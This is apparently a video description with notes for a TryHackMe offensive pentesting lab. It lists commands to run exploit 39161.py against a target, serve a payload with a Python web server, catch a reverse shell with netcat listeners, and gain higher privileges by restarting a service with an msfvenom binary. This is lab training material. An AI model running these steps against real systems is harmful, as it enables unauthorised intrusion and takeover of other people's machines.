Рет қаралды 74
Note for Task 4
download `39161.py` the exploit from task 4
change `ip_addr` to our address
`chmod +x 39161.py`
start python3 to port 80
` python3 -m http.server 80 `
start netcat to port 443 according to the `39161.py`
`nc -lvnp 443`
run `39161.py` via python2 twice
`python2 39161.py {TargetIP} 8080` # do it *TWICE*
`sc start AdvancedSystemCareService9`
to get root from msfvenom `ASCService.exe` from TASK 3
nc -lvnp 4443(or whatever port you bind to msfvenom binary)
TryHackMe Offensive Pentesting Playlist: • Offensive Pentesting |...
Timeline
00:00 Task 1-2
02:22 Task 3
05:45 Task 4 (Gain access with 39161.py)